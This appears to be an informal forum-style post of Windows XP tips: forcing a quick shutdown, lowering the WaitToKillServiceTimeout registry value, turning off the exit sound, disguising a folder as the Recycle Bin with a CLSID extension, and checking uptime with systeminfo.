Imidiate rapid shut down window while shutting down window. open task manager(Ctr+Alt+Del), Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab. Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down. Speed Up Ur Shut down !! Start Regedit. Navigate to HKEY_ LOCAL_MACHINE/ SYSTEM/ CurrentControlSet/Control. Click on the "Control" Folder. Select "WaitToKillServiceTimeout" Right click on it and select Modify. Set it a value lower than 2000 ( Mine is set to 200) . and ! Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it. now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system.
¤ Hide ur folders.. never known trick. Disguise them to "Recycle Bin" ¤
Rename any folder with extension { 645 FF 040-5081-101 B-9 F08- 00 AA002 F954 E} eg, if u've a folder games press F2 , then type, "games.{645 FF 040-5081- 101 B-9 F08-00 AA002 F954 E}" c the magic.... then 2 get to original form, remove the extension using "ren games. {645 FF 040-5081-101 B-9 F08- 00 AA002 F954 E} games" in dos or as a bat file n u are done..
¤ System information ¤
system up time only for xp professional edition It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

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